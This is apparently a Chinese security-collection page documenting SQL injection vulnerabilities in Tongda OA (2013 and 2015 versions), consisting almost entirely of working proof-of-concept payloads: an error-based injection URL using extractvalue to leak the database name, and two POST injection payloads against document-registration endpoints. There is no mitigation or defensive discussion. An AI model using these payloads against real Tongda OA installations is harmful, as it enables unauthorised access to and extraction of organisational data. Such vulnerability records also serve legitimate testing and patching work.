menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 001-通达OA chevron_right 006-通达oa sql注入.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    006-通达oa sql注入.md
    509 B / 2021-07-17 00:01:26
        ## 通达oa sql注入
    
    ### 漏洞影响
    
    2013、2015版本
    
    ### 复现过程
    
    poc
    
    `http://url/general/mytable/intel_view/workflow.php?MAX_COUNT=15 procedure analyse(extrac tvalue(rand(),concat(0x3a,database())),1)&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&MODULE_ID=Math.random`
    
    ```bash
    http://url/general/document/index.php/recv/register/turn    
    
    post(_SERVER=&rid=1')
    ```
    
    ```bash
    http://url/general/document/index.php/recv/register/insert  
    
    post:   
    title)values("'"^exp(if(1%3d2,1,710)))#=1&_SERVER=
    ```
    
    links
    file_download